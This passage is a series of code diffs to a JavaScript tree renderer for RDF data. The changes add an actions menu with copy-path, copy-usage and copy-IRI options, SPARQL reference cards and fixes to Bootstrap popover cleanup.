     pred.classList.add('predicate');
-    row.appendChild(pred);
+    text.appendChild(pred);
 
-    row.appendChild(document.createTextNode(' → '));
-    row.appendChild(renderTerm(object, this._navigationContext(pathCtx)));
+    text.appendChild(document.createTextNode(' → '));
+    text.appendChild(renderTerm(object, this._navigationContext(pathCtx)));
+    row.appendChild(text);
     // Anchored on the property: it is what the card names, and it sits at the
     // start of the row where the eye already is.
     row.appendChild(this._buildRowInfoButton(predValue, null, pathCtx, object, pred));

--- a/src/js/TreeRenderer.js
+++ b/src/js/TreeRenderer.js
@@ -25,6 +25,7 @@
 import { ns, resolvePrefix, shrink } from './utils/namespaces.js';
 import { renderSubjectBadge, renderTerm } from './TermRenderer.js';
 import { copyToClipboard } from './utils/clipboardCopy.js';
+import { showToast } from './utils/toast.js';
 
 const RDF_TYPE = ns.rdf + 'type';
 
@@ -38,6 +39,55 @@ const IRIREF_FORBIDDEN = /[\u0000-\u0020<>"{}|^`\\]/g;
 // Anything outside it keeps its full bracketed IRI — over-bracketing costs
 // only verbosity, while a malformed prefixed name costs correctness.
 const SAFE_LOCAL_NAME = /^[A-Za-z0-9_](?:[A-Za-z0-9_.-]*[A-Za-z0-9_-])?$/;
+
+// The kinds of term that make a statement of their own, so that a usage
+// pattern can be written for them.
+//
+// The characteristics below are property classes in their own right —
+// owl:FunctionalProperty is a subclass of rdf:Property, the rest of
+// owl:ObjectProperty — so declaring one says what the subject is, not merely
+// how it behaves. A property may carry only a characteristic and nothing else.
+const PROPERTY_TYPES = [
+  `${ns.owl}ObjectProperty`,
+  `${ns.owl}DatatypeProperty`,
+  `${ns.owl}AnnotationProperty`,
+  `${ns.rdf}Property`,
+  `${ns.owl}FunctionalProperty`,
+  `${ns.owl}InverseFunctionalProperty`,
+  `${ns.owl}TransitiveProperty`,
+  `${ns.owl}SymmetricProperty`,
+  `${ns.owl}AsymmetricProperty`,
+  `${ns.owl}ReflexiveProperty`,
+  `${ns.owl}IrreflexiveProperty`,
+];
+
+// Declaring any of these makes a subject part of a vocabulary rather than
+// something the data describes — whichever namespace it happens to live in.
+// The list cannot be complete: OWL and RDFS keep company with metatypes
+// nobody thinks of, which is why it never stands alone.
+const TERM_TYPES = [
+  `${ns.owl}Class`,
+  `${ns.rdfs}Class`,
+  `${ns.rdfs}Datatype`,
+  `${ns.owl}Ontology`,
+  ...PROPERTY_TYPES,
+];
+
+// The reference card is built as HTML rather than elements, so everything
+// placed in it is escaped. Both the card for a resource and the card for a
+// row are laid out the same way, and share these.
+const esc = (s) => String(s)
+  .replace(/&/g, '&amp;')
+  .replace(/</g, '&lt;')
+  .replace(/>/g, '&gt;')
+  .replace(/"/g, '&quot;');
+
+const copyIcon = (value, label) =>
+  `<button class="tree-info-copy-inline" data-copy="${esc(value)}" title="${esc(label)}"><i class="bi bi-clipboard"></i></button>`;
+
+const infoRow = (label, copyValue, display, copyLabel) =>
+  `<div class="tree-info-row"><span class="tree-info-label">${label}</span>`
+  + `${copyIcon(copyValue, copyLabel)}<code class="tree-info-value">${esc(display)}</code></div>`;
 
 export class TreeRenderer {
   constructor(container) {
@@ -319,8 +369,11 @@ export class TreeRenderer {
     const header = card.querySelector('.tree-card-header');
     header.style.cursor = 'pointer';
     header.addEventListener('click', (e) => {
-      const target = e.target.closest('a, .split-badge, .tree-toggle');
-      if (target && target !== toggle) return; // let links/badges handle it
+      // Let links, badges and the actions menu handle their own clicks. The
+      // menu lives inside the header, so without this opening it would also
+      // expand the card underneath.
+      const target = e.target.closest('a, .split-badge, .tree-toggle, .tree-actions');
+      if (target && target !== toggle) return;
       toggleBody();
     });
 
@@ -349,22 +402,68 @@ export class TreeRenderer {
     header.appendChild(toggle);
     header.appendChild(document.createTextNode(' '));
 
+    let pred = null;
     if (incomingPredicate) {
       // Deliberately carries no navigation context. Clicking a predicate jumps
       // to its definition in the ontology, which is not somewhere the walked
       // route leads — reporting the chain here would claim the notice reaches
       // the term epo:announcesRole by following epo:announcesRole.
-      const pred = renderTerm({ termType: 'NamedNode', value: incomingPredicate });
+      pred = renderTerm({ termType: 'NamedNode', value: incomingPredicate });
       pred.classList.add('predicate');
       header.appendChild(pred);
       header.appendChild(document.createTextNode(' → '));
     }
 
-    header.appendChild(renderSubjectBadge(subjectValue, this._navigationContext(pathCtx)));
+    const badge = renderSubjectBadge(subjectValue, this._navigationContext(pathCtx));
+    header.appendChild(badge);
 
-    // Add info icon for root-level cards (no incoming predicate)
-    if (!incomingPredicate) {
-      header.appendChild(this._buildInfoButton(subjectValue, predicates));
+    if (incomingPredicate) {
+      // A nested card's header is a row like any other: it states one triple,
+      // and its card answers for that statement rather than for the resource
+      // in isolation.
+      // A blank node is passed as none: its label belongs to this parse alone,
+      // so there is neither an IRI to offer nor anything worth copying.
+      const object = this._isBlankSubject(subjectValue)
+        ? null
+        : { termType: 'NamedNode', value: subjectValue };
+      header.appendChild(
+        this._buildRowInfoButton(incomingPredicate, predicates, pathCtx, object, pred));
+    } else {
+      // A root card's menu answers for the resource, so its card hangs off
+      // the badge that names it.
+      // An ontology term is not a place in anyone's data, so there is no path
+      // to it — the same distinction the card makes by showing Usage instead.
+      // Offering one here would copy "?datatypeProperty a owl:DatatypeProperty",
+      // which matches every datatype property rather than this one.
+      const isTerm = this._isOntologyTerm(subjectValue, predicates);
+      header.appendChild(this._buildActionsMenu({
+        label: 'Actions for this element',
+        anchor: badge,
+        copies: [
+          {
+            icon: 'bi-clipboard',
+            item: 'Copy path',
+            value: isTerm ? null : this._buildPathPattern(subjectValue, predicates),
+            title: 'Path copied',
+            body: 'The pattern that reaches this resource in a query:',
+          },
+          {
+            icon: 'bi-clipboard',
+            item: 'Copy usage',
+            value: isTerm ? this._buildUsagePattern(subjectValue, predicates) : null,
+            title: 'Usage copied',
+            body: 'The shape of the statement this property makes:',
+          },
+          {
+            icon: 'bi-clipboard',
+            item: 'Copy IRI',
+            value: this._isBlankSubject(subjectValue) ? null : subjectValue,
+            title: 'IRI copied',
+            body: 'The identifier of this resource is now on your clipboard:',
+          },
+        ],
+        buildContent: () => this._buildInfoRows(subjectValue, predicates),
+      }));
     }
 
     return header;
@@ -383,31 +482,31 @@ export class TreeRenderer {
   }
 
   // The body of the SPARQL reference card, as HTML. Split out from
-  // _buildInfoButton so the content can be asserted on without standing up a
+  // _buildActionsMenu so the content can be asserted on without standing up a
   // Bootstrap popover.
   _buildInfoRows(subjectValue, predicates) {
-    const esc = (s) => s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;').replace(/"/g, '&quot;');
-    const copyIcon = (value, label) =>
-      `<button class="tree-info-copy-inline" data-copy="${esc(value)}" title="${label}"><i class="bi bi-clipboard"></i></button>`;
-    const row = (label, copyValue, display, copyLabel) =>
-      `<div class="tree-info-row"><span class="tree-info-label">${label}</span>${copyIcon(copyValue, copyLabel)}<code class="tree-info-value">${esc(display)}</code></div>`;
-
     // Work out everything the card will show before deciding what to declare.
     // The prefixes needed depend on the finished text — the Path in particular
     // carries predicates from the whole walked route, not just this resource's
     // type — so guessing them from the terms that went in gets it wrong.
-    const isVocabularyTerm = Boolean(resolvePrefix(subjectValue));
+    const isVocabularyTerm = this._isOntologyTerm(subjectValue, predicates);
     const types = this._typeUris(predicates).map(uri => this._shrinkOrBracket(uri));
 
     let name = null;
     let nameCopy = null;
     let path = null;
+    let usage = null;
     let iri = null;
 
     if (isVocabularyTerm) {
       // The subject is itself an ontology term, so it names a class or
       // property rather than describing an instance.
       name = nameCopy = this._shrinkOrBracket(subjectValue);
+      // No Path: a term is not somewhere the data leads. The same property is
+      // reached by countless routes, and the one the reader happened to
+      // arrive by is a fact about that notice, not about the term. What can
+      // be said is how the term is used, which the ontology states.
+      usage = this._buildUsagePattern(subjectValue, predicates);
     } else {
       if (types.length) {
         // What is copied is what is shown, and it matches what the Path binds
@@ -430,14 +529,64 @@ export class TreeRenderer {
     // card can be pasted into an empty query and still parse.
     for (const prefix of this._prefixesUsedIn([name, path])) {
       const decl = `PREFIX ${prefix}: <${ns[prefix]}>`;
-      rows.push(row('Prefix', decl, decl, 'Copy prefix declaration'));
+      rows.push(infoRow('Prefix', decl, decl, 'Copy prefix declaration'));
     }
 
-    if (name) rows.push(row('Name', nameCopy, name, 'Copy name'));
-    if (path) rows.push(row('Path', path, path, 'Copy path'));
-    if (iri) rows.push(row('IRI', iri, iri, 'Copy IRI'));
+    if (name) rows.push(infoRow('Name', nameCopy, name, 'Copy name'));
+    if (path) rows.push(infoRow('Path', path, path, 'Copy path'));
+    if (usage) rows.push(infoRow('Usage', usage, usage, 'Copy usage'));
+    if (iri) rows.push(infoRow('IRI', iri, iri, 'Copy IRI'));
 
     return [`<div class="tree-info-popover">`, ...rows, `</div>`].join('\n');
+  }
+
+  // Whether the subject is a term of some vocabulary — a class or a property
+  // — rather than a resource described by the data.
+  //
+  // Two signals, either of which is enough.
+  //
+  // What it declares itself to be holds for a vocabulary this application has
+  // never heard of. Where it lives holds for terms whose declared type is not
+  // one this code lists — `xsd:date a rdfs:Datatype`, a property declared only
+  // `owl:FunctionalProperty` — and for terms with no triples loaded at all.
+  // Neither covers the other, so both are asked.
+  _isOntologyTerm(subjectValue, predicates) {
+    const declared = new Set(this._typeUris(predicates));
+    return TERM_TYPES.some(type => declared.has(type)) || Boolean(resolvePrefix(subjectValue));
+  }
+
+  // How a property is used, from what the ontology says it connects:
+  // "?document epo:hasPublicationDate ?date ." from rdfs:domain Document and
+  // rdfs:range xsd:date.
+  //
+  // This is what the term's own page can honestly offer in place of a Path. A
+  // path is a route through one notice's data; a property has no position, it
+  // has a shape, and the shape holds wherever it is used.
+  //
+  // Null for anything that is not a property — a class is named, not used in
+  // this sense — and the variables fall back to neutral names where the
+  // ontology states no domain or range.
+  _buildUsagePattern(subjectValue, predicates) {
+    const declared = new Set(this._typeUris(predicates));
+    if (!PROPERTY_TYPES.some(type => declared.has(type))) return null;
+
+    const first = (predicateUri) => (predicates?.get(predicateUri) || [])
+      .map(term => term.value)
+      .filter(Boolean)[0] ?? null;
+
+    const domain = first(`${ns.rdfs}domain`);
+    const range = first(`${ns.rdfs}range`);
+    const subject = domain ? this._variableNameFrom([domain]) : 'subject';
+    const object = range ? this._variableNameFrom([range]) : 'value';
+
+    // Domain and range appear only as variable names, never as terms, so a
+    // usage pattern introduces no prefix beyond the property's own — which is
+    // why it is not consulted when working out the declarations.
+    //
+    // A property whose domain and range are the same class would bind one
+    // variable at both ends, matching only self-references.
+    const objectVar = subject === object ? `${object}2` : object;
+    return `?${subject} ${this._shrinkOrBracket(subjectValue)} ?${objectVar} .`;
   }
 
   // The prefixes appearing in the given patterns, in namespace-table order.
@@ -455,52 +604,104 @@ export class TreeRenderer {
     );
   }
 
-  _buildInfoButton(subjectValue, predicates) {
+  // The actions menu carried by a card header and by every row.
+  //
+  // A row states a triple, and "how do I reach this in a query" is asked of a
+  // value at least as often as of the resource holding it — so the menu sits
+  // on both. It holds one item today; a menu rather than a bare button
+  // because a row is where further actions on a single statement belong, and
+  // because one repeated on every row should be quiet until it is wanted.
+  //
+  // `buildContent` is called the first time the card is opened rather than at
+  // render: a notice puts hundreds of these on screen and almost none of them
+  // is opened.
+  _buildActionsMenu({ label, buildContent, anchor = null, copies = [] }) {
+    const wrap = document.createElement('span');
+    wrap.className = 'tree-actions dropdown';
+
     const btn = document.createElement('button');
-    btn.className = 'tree-info-btn';
-    btn.setAttribute('aria-label', 'SPARQL reference card');
-    btn.setAttribute('title', 'Click here for referencing this element in your SPARQL query');
-    btn.innerHTML = '<i class="bi bi-code-square"></i>';
-    const tooltip = new bootstrap.Tooltip(btn, { placement: 'top' });
+    btn.className = 'tree-actions-btn';
+    btn.type = 'button';
+    btn.setAttribute('data-bs-toggle', 'dropdown');
+    btn.setAttribute('aria-expanded', 'false');
+    btn.setAttribute('aria-label', label);
+    btn.innerHTML = '<i class="bi bi-three-dots-vertical"></i>';
 
-    const title = `<span>SPARQL reference card</span><button class="btn-close tree-info-close" aria-label="Close"></button>`;
-    const lines = this._buildInfoRows(subjectValue, predicates);
+    const menu = document.createElement('ul');
+    menu.className = 'dropdown-menu dropdown-menu-end tree-actions-menu';
 
-    const popover = new bootstrap.Popover(btn, {
-      title,
-      content: lines,
+    const addItem = (icon, text) => {
+      const li = document.createElement('li');
+      const button = document.createElement('button');
+      button.type = 'button';
+      button.className = 'dropdown-item';
+      button.innerHTML = `<i class="bi ${icon}"></i> ${text}`;
+      li.appendChild(button);
+      menu.appendChild(li);
+      return button;
+    };
+
+    // The path comes first. People reading a notice this closely are mostly
+    // learning SPARQL and ePO, and the path is what they came for; the value
+    // is the everyday task, and the card the longer answer.
+    let copied = 0;
+    for (const copy of copies) {
+      if (!copy.value) continue;
+      this._wireCopyItem(addItem(copy.icon, copy.item), copy);
+      copied++;
+    }
+    // Separated because it is a different kind of thing: the items above act
+    // and close, this one opens something to read. No rule where there is
+    // nothing above it to divide from.
+    if (copied) {
+      const li = document.createElement('li');
+      const hr = document.createElement('hr');
+      hr.className = 'dropdown-divider';
+      li.appendChild(hr);
+      menu.appendChild(li);
+    }
+    const action = addItem('bi-code-square', 'SPARQL reference card');
+
+    wrap.appendChild(btn);
+    wrap.appendChild(menu);
+
+    // The card is anchored to what it describes — the property on a row, the
+    // badge on a card header — rather than to the kebab at the right edge,
+    // which says nothing about which row was asked about.
+    const anchorEl = anchor || btn;
+
+    let popover = null;
+    const getPopover = () => (popover ??= new bootstrap.Popover(anchorEl, {
+      title: `<span>SPARQL reference card</span><button class="btn-close tree-info-close" aria-label="Close"></button>`,
+      content: buildContent(),
       html: true,
       sanitize: false,
       placement: 'bottom',
       trigger: 'manual',
       container: 'body',
       customClass: 'tree-info-popover-container',
-    });
+    }));
 
-    btn.addEventListener('click', (e) => {
-      e.stopPropagation();
-      tooltip.hide();
-      tooltip.disable();
+    // The kebab itself is Bootstrap's — it opens and closes the menu through
+    // the data API, so nothing here intercepts its click. The card opens from
+    // the item, once the menu has closed itself.
+    action.addEventListener('click', () => {
+      getPopover();
       if (this._activePopover === popover) {
         popover.hide();
         this._activePopover = null;
-        tooltip.enable();
-      } else {
-        this._dismissPopover();
-        popover.show();
-        this._activePopover = popover;
+        return;
       }
+      this._dismissPopover();
+      popover.show();
+      this._activePopover = popover;
     });
 
-    btn.addEventListener('hidden.bs.popover', () => {
-      tooltip.enable();
-    });
-
-    btn.addEventListener('shown.bs.popover', () => {
+    anchorEl.addEventListener('shown.bs.popover', () => {
       const tip = popover.tip;
       if (!tip) return;
       const onOutsideClick = (e) => {
-        if (!tip.contains(e.target) && !btn.contains(e.target)) {
+        if (!tip.contains(e.target) && !wrap.contains(e.target)) {
           popover.hide();
           this._activePopover = null;
           document.removeEventListener('click', onOutsideClick, true);
@@ -511,7 +712,7 @@ export class TreeRenderer {
         document.removeEventListener('click', onOutsideClick, true);
       };
       this._activePopoverCleanup = cleanup;
-      btn.addEventListener('hidden.bs.popover', () => {
+      anchorEl.addEventListener('hidden.bs.popover', () => {
         cleanup();
         if (this._activePopoverCleanup === cleanup) this._activePopoverCleanup = null;
       }, { once: true });
@@ -531,7 +732,115 @@ export class TreeRenderer {
       });
     });
 
-    return btn;
+    return wrap;
+  }
+
+  _buildRowInfoButton(predicateUri, objectPredicates, pathCtx, object = null, anchor = null) {
+    const isResource = object?.termType === 'NamedNode';
+    return this._buildActionsMenu({
+      label: 'Actions for this value',
+      anchor,
+      copies: [
+        {
+          icon: 'bi-clipboard',
+          item: 'Copy path',
+          value: this._buildRowPathPattern(predicateUri, objectPredicates, pathCtx),
+          title: 'Path copied',
+          body: 'The pattern that reaches this value from the notice:',
+        },
+        {
+          icon: 'bi-clipboard',
+          item: 'Copy value',
+          // What the row shows: the text of a literal, the IRI of a resource.
+          // Not the shortened form on screen — what is copied is meant to be
+          // pasted somewhere else, where the short form means nothing.
+          //
+          // A blank node has nothing to offer for the same reason: "b0" is a
+          // label this parse invented, and it identifies nothing anywhere
+          // else. Nested blank-node headers already withhold it.
+          value: object && object.termType !== 'BlankNode' ? object.value : null,
+          title: isResource ? 'IRI copied' : 'Value copied',
+          body: isResource
+            ? 'The identifier of this resource is now on your clipboard:'
+            : 'This value is now on your clipboard:',
+        },
+      ],
+      buildContent: () => this._buildRowInfoRows(predicateUri, objectPredicates, pathCtx, object),
+    });
+  }
+
+  // Copy to the clipboard, reporting through a toast.
+  //
+  // Not by changing the item: the menu closes on the click, so a tick shown
+  // there is gone before it can be read. The toast names what was copied,
+  // because a resource's value is a long URI and "copied" alone leaves the
+  // user unsure which of the two things on the row they now hold.
+  _wireCopyItem(item, { value, title, body }) {
+    // Carried on the element, as the card's own copy buttons do, so what
+    // would land on the clipboard can be read off the DOM.
+    item.setAttribute('data-copy', value);
+    item.addEventListener('click', async () => {
+      if (await copyToClipboard(value)) {
+        showToast(title, body, { detail: value });
+      } else {
+        showToast('Nothing copied', 'The browser refused access to the clipboard.',
+          { variant: 'warning' });
+      }
+    });
+  }
+
+  // The body of a row's reference card.
+  //
+  // A row is a statement, so the card describes the statement: the property
+  // that makes it, and the route from the notice to the value it points at.
+  // Where that value is a resource its IRI is offered too; a literal has none.
+  _buildRowInfoRows(predicateUri, objectPredicates, pathCtx, object) {
+    const name = this._shrinkOrBracket(predicateUri);
+    const path = this._buildRowPathPattern(predicateUri, objectPredicates, pathCtx);
+    const iri = object && object.termType === 'NamedNode' ? this._asIriRef(object.value) : null;
+
+    const rows = [`<p class="tree-info-intro">Use the following in your SPARQL query</p>`];
+    for (const prefix of this._prefixesUsedIn([name, path])) {
+      const decl = `PREFIX ${prefix}: <${ns[prefix]}>`;
+      rows.push(infoRow('Prefix', decl, decl, 'Copy prefix declaration'));
+    }
+    rows.push(infoRow('Name', name, name, 'Copy name'));
+    if (path) rows.push(infoRow('Path', path, path, 'Copy path'));
+    if (iri) rows.push(infoRow('IRI', iri, iri, 'Copy IRI'));
+
+    return [`<div class="tree-info-popover">`, ...rows, `</div>`].join('\n');
+  }
+
+  // The pattern reaching a row's value, as one property path from wherever
+  // the walk started — the same route _buildPathPattern gives for the card
+  // this row sits in, carried one predicate further.
+  //
+  // Null when the walk has no binding to start from: an untyped blank node at
+  // the root of the tree can be reached in the display but not in a query.
+  _buildRowPathPattern(predicateUri, objectPredicates, pathCtx) {
+    if (!pathCtx) return null;
+    const fromNavigation = pathCtx.root === this._navigatedSubject && this._rootPattern;
+    const anchor = fromNavigation ? this._rootPattern : pathCtx.anchor;
+    if (!anchor) return null;
+    const chain = fromNavigation
+      ? [...(this._pathFromRoot || []), ...pathCtx.chain]
+      : pathCtx.chain;
+    if (!chain.length) return null;
+
+    // Named after what the value is where the data says so, and after the
+    // property that reaches it where it does not — a literal has no type.
+    //
+    // Renamed when it collides with the anchor's variable, as _targetVariable
+    // does for a card: a notice pointing at another notice would otherwise
+    // read "?notice a epo:Notice ; epo:refersToPrevious ?notice .", which
+    // matches only the notices that refer to themselves.
+    const typeUris = this._typeUris(objectPredicates);
+    const name = this._variableNameFrom(typeUris.length ? typeUris : [predicateUri]);
+    const variable = anchor.startsWith(`?${name} `) ? `${name}2` : name;
+    // "?notice a epo:Notice" already states a predicate, so the chain
+    // continues it with ";". An IRI anchor states none.
+    const join = anchor.startsWith('?') ? ' ;' : '';
+    return `${anchor}${join} ${this._formatPropertyPath(chain)} ?${variable} .`;
   }
 
   // The triple pattern that reaches this resource in a query.
@@ -734,6 +1043,9 @@ export class TreeRenderer {
 
     row.appendChild(document.createTextNode(' → '));
     row.appendChild(renderTerm(object, this._navigationContext(pathCtx)));
+    // Anchored on the property: it is what the card names, and it sits at the
+    // start of the row where the eye already is.
+    row.appendChild(this._buildRowInfoButton(predValue, null, pathCtx, object, pred));
 
     return row;
   }

--- a/src/js/TreeRenderer.js
+++ b/src/js/TreeRenderer.js
@@ -93,7 +93,11 @@ export class TreeRenderer {
   constructor(container) {
     this.container = container;
     this.subjectIndex = null; // Map<subject, Map<predicate, object[]>>
-    this._activePopover = null;
+    // The open card's own teardown, not the Popover instance. Holding the
+    // instance would mean disposing an object another closure still points
+    // at, and a disposed Popover is a husk — Bootstrap nulls every property
+    // on it, so the next open would call show() on nothing.
+    this._closeActivePopover = null;
     this._toggles = new Map();  // subjectValue → { toggle, expand, collapse, card }
     this._searchIndex = [];     // flat array of { label, subjectValue, kind }
   }
@@ -469,16 +473,9 @@ export class TreeRenderer {
     return header;
   }
 
+  /** Shut whichever card is open, through the teardown that card owns. */
   _dismissPopover() {
-    if (this._activePopoverCleanup) {
-      this._activePopoverCleanup();
-      this._activePopoverCleanup = null;
-    }
-    if (this._activePopover) {
-      this._activePopover.hide();
-      this._activePopover.dispose();
-      this._activePopover = null;
-    }
+    if (this._closeActivePopover) this._closeActivePopover();
   }
 
   // The body of the SPARQL reference card, as HTML. Split out from
@@ -671,6 +668,7 @@ export class TreeRenderer {
     const anchorEl = anchor || btn;
 
     let popover = null;
+    let onOutsideClick = null;
     const getPopover = () => (popover ??= new bootstrap.Popover(anchorEl, {
       title: `<span>SPARQL reference card</span><button class="btn-close tree-info-close" aria-label="Close"></button>`,
       content: buildContent(),
@@ -680,49 +678,58 @@ export class TreeRenderer {
       trigger: 'manual',
       container: 'body',
       customClass: 'tree-info-popover-container',
+      // Bootstrap's hide() is animated by default, and so finishes after it
+      // returns — while dispose() empties the instance at once. Disposing on
+      // the way out then leaves the transition reading from what it emptied
+      // (`Cannot convert undefined or null to object`), and leaves the
+      // anchor's aria-describedby pointing at a card that has gone. Without
+      // the animation the close is over when hide() returns, and a card
+      // asked for from a menu is better appearing at once anyway.
+      animation: false,
     }));
+
+    // Every way this card can close comes through here. Bootstrap keeps its
+    // instances in a strong map and only dispose() removes them, so a card
+    // opened and left undisposed pins its anchor and its tip for the life of
+    // the page. Disposing is not enough on its own either: dispose() empties
+    // the instance, so the reference has to go with it or the next open
+    // hands back the husk. Both steps are safe here only because the popover
+    // is built without animation, so hide() has finished when it returns.
+    const close = () => {
+      if (onOutsideClick) {
+        document.removeEventListener('click', onOutsideClick, true);
+        onOutsideClick = null;
+      }
+      if (popover) {
+        popover.hide();
+        popover.dispose();
+        popover = null;
+      }
+      if (this._closeActivePopover === close) this._closeActivePopover = null;
+    };
 
     // The kebab itself is Bootstrap's — it opens and closes the menu through
     // the data API, so nothing here intercepts its click. The card opens from
     // the item, once the menu has closed itself.
     action.addEventListener('click', () => {
-      getPopover();
-      if (this._activePopover === popover) {
-        popover.hide();
-        this._activePopover = null;
+      if (this._closeActivePopover === close) {
+        close();
         return;
       }
       this._dismissPopover();
-      popover.show();
-      this._activePopover = popover;
+      getPopover().show();
+      this._closeActivePopover = close;
     });
 
     anchorEl.addEventListener('shown.bs.popover', () => {
       const tip = popover.tip;
       if (!tip) return;
-      const onOutsideClick = (e) => {
-        if (!tip.contains(e.target) && !wrap.contains(e.target)) {
-          popover.hide();
-          this._activePopover = null;
-          document.removeEventListener('click', onOutsideClick, true);
-        }
+      onOutsideClick = (e) => {
+        if (!tip.contains(e.target) && !wrap.contains(e.target)) close();
       };
       document.addEventListener('click', onOutsideClick, true);
-      const cleanup = () => {
-        document.removeEventListener('click', onOutsideClick, true);
-      };
-      this._activePopoverCleanup = cleanup;
-      anchorEl.addEventListener('hidden.bs.popover', () => {
-        cleanup();
-        if (this._activePopoverCleanup === cleanup) this._activePopoverCleanup = null;
-      }, { once: true });
       const closeBtn = tip.querySelector('.tree-info-close');
-      if (closeBtn) {
-        closeBtn.addEventListener('click', () => {
-          popover.hide();
-          this._activePopover = null;
-        });
-      }
+      if (closeBtn) closeBtn.addEventListener('click', close);
       tip.querySelectorAll('.tree-info-copy-inline').forEach(cb => {
         cb.addEventListener('click', async () => {
           const ok = await copyToClipboard(cb.dataset.copy);

--- a/src/js/TreeRenderer.js
+++ b/src/js/TreeRenderer.js
@@ -28,6 +28,17 @@ import { copyToClipboard } from './utils/clipboardCopy.js';
 
 const RDF_TYPE = ns.rdf + 'type';
 
+// The characters SPARQL's IRIREF grammar excludes: everything up to and
+// including space, plus <, >, ", {, }, |, ^, backtick and backslash. A URI
+// carrying one of these cannot be written between angle brackets at all.
+const IRIREF_FORBIDDEN = /[\u0000-\u0020<>"{}|^`\\]/g;
+
+// A conservative subset of SPARQL's PN_LOCAL: starts with a letter, digit or
+// underscore, may carry dots or hyphens inside, and never ends in a dot.
+// Anything outside it keeps its full bracketed IRI — over-bracketing costs
+// only verbosity, while a malformed prefixed name costs correctness.
+const SAFE_LOCAL_NAME = /^[A-Za-z0-9_](?:[A-Za-z0-9_.-]*[A-Za-z0-9_-])?$/;
+
 export class TreeRenderer {
   constructor(container) {
     this.container = container;
@@ -37,7 +48,13 @@ export class TreeRenderer {
     this._searchIndex = [];     // flat array of { label, subjectValue, kind }
   }
 
-  render(quads, { subjectUri } = {}) {
+  render(quads, { subjectUri, pathFromRoot = [], rootPattern = null } = {}) {
+    // How the user reached this tree: the predicate chain walked from the
+    // first breadcrumb entry, and the pattern binding that entry. Both come
+    // from DataView, which owns the breadcrumb. Empty when we are at the root.
+    this._pathFromRoot = pathFromRoot;
+    this._rootPattern = rootPattern;
+    this._navigatedSubject = subjectUri;
     this._dismissPopover();
     this.container.innerHTML = '';
     this._toggles.clear();
@@ -70,10 +87,15 @@ export class TreeRenderer {
 
     // `ancestors` is per-branch, not global: the same subject can appear
     // under multiple parents but a real A → B → A cycle is guarded against.
-    // Each root computes its own type context for the copy-path snippet.
     for (const subj of roots) {
-      const rootContext = this._buildRootContext(subj);
-      const node = this._renderSubjectTree(subj, new Set(), null, [], rootContext);
+      // Each root anchors its own chain. A graph can surface several, and a
+      // chain walked beneath one of them says nothing about the others.
+      const pathCtx = {
+        root: subj,
+        anchor: this._buildAnchorPattern(subj, this.subjectIndex.get(subj)),
+        chain: [],
+      };
+      const node = this._renderSubjectTree(subj, new Set(), null, pathCtx);
       this.container.appendChild(node);
     }
   }
@@ -190,9 +212,15 @@ export class TreeRenderer {
 
   _buildIndex(quads) {
     const index = new Map();
+    // The index is keyed by subject value, which loses the distinction
+    // between an IRI and a blank node. That matters when building query
+    // patterns: a blank node's label is local to the parse and cannot be
+    // written as an IRI, so remember which subjects are blank.
+    this._blankSubjects = new Set();
     for (const quad of quads) {
       const subj = quad.subject.value;
       const pred = quad.predicate.value;
+      if (quad.subject.termType === 'BlankNode') this._blankSubjects.add(subj);
       if (!index.has(subj)) index.set(subj, new Map());
       const predicates = index.get(subj);
       if (!predicates.has(pred)) predicates.set(pred, []);
@@ -219,15 +247,15 @@ export class TreeRenderer {
 
   // Render one subject as a card. Nested cards are lazily built on first
   // toggle-expand to keep the initial DOM small.
-  // `predicatePath` is the chain of predicate URIs from the root to this
-  // card (empty for the root). It drives the "copy path" affordance.
-  _renderSubjectTree(subjectValue, ancestors, incomingPredicate, predicatePath = [], rootContext = null) {
+  _renderSubjectTree(subjectValue, ancestors, incomingPredicate, pathCtx = null) {
     const fragment = document.createDocumentFragment();
     const predicates = this.subjectIndex.get(subjectValue);
     if (!predicates) return fragment;
 
     if (ancestors.has(subjectValue)) {
-      fragment.appendChild(this._renderCycleMarker(subjectValue));
+      // The marker stands where the nested card would have been, so it is
+      // reached by the same route and has to report the same context.
+      fragment.appendChild(this._renderCycleMarker(subjectValue, pathCtx));
       return fragment;
     }
 
@@ -237,14 +265,14 @@ export class TreeRenderer {
     const card = document.createElement('div');
     card.className = 'tree-card';
     card.dataset.subject = subjectValue;
-    card.appendChild(this._buildCardHeader(subjectValue, predicates, incomingPredicate, predicatePath, rootContext));
+    card.appendChild(this._buildCardHeader(subjectValue, predicates, incomingPredicate, pathCtx));
 
     // Root cards render their body eagerly so the tree is
     // immediately visible. Nested cards defer body creation until
     // first expand (lazy render).
     const startExpanded = !incomingPredicate;
     const toggle = card.querySelector('.tree-toggle');
-    const buildBody = () => this._buildCardBody(predicates, branchAncestors, predicatePath, rootContext);
+    const buildBody = () => this._buildCardBody(predicates, branchAncestors, pathCtx);
     let body = null;
 
     if (startExpanded) {
@@ -300,15 +328,15 @@ export class TreeRenderer {
     return fragment;
   }
 
-  _renderCycleMarker(subjectValue) {
+  _renderCycleMarker(subjectValue, pathCtx = null) {
     const el = document.createElement('div');
     el.className = 'tree-node';
-    el.appendChild(renderTerm({ termType: 'NamedNode', value: subjectValue }));
+    el.appendChild(renderTerm({ termType: 'NamedNode', value: subjectValue }, this._navigationContext(pathCtx)));
     el.appendChild(document.createTextNode(' (circular ref)'));
     return el;
   }
 
-  _buildCardHeader(subjectValue, predicates, incomingPredicate, predicatePath = [], rootContext = null) {
+  _buildCardHeader(subjectValue, predicates, incomingPredicate, pathCtx = null) {
     const header = document.createElement('div');
     header.className = 'tree-card-header';
 
@@ -322,23 +350,21 @@ export class TreeRenderer {
     header.appendChild(document.createTextNode(' '));
 
     if (incomingPredicate) {
+      // Deliberately carries no navigation context. Clicking a predicate jumps
+      // to its definition in the ontology, which is not somewhere the walked
+      // route leads — reporting the chain here would claim the notice reaches
+      // the term epo:announcesRole by following epo:announcesRole.
       const pred = renderTerm({ termType: 'NamedNode', value: incomingPredicate });
       pred.classList.add('predicate');
       header.appendChild(pred);
       header.appendChild(document.createTextNode(' → '));
     }
 
-    header.appendChild(renderSubjectBadge(subjectValue));
+    header.appendChild(renderSubjectBadge(subjectValue, this._navigationContext(pathCtx)));
 
     // Add info icon for root-level cards (no incoming predicate)
     if (!incomingPredicate) {
       header.appendChild(this._buildInfoButton(subjectValue, predicates));
-    }
-
-    // "Copy path" affordance for nested cards — the property path from the
-    // root to this resource. Hidden until the header is hovered (see CSS).
-    if (predicatePath.length > 0) {
-      header.appendChild(this._buildCopyPathButton(predicatePath, rootContext));
     }
 
     return header;
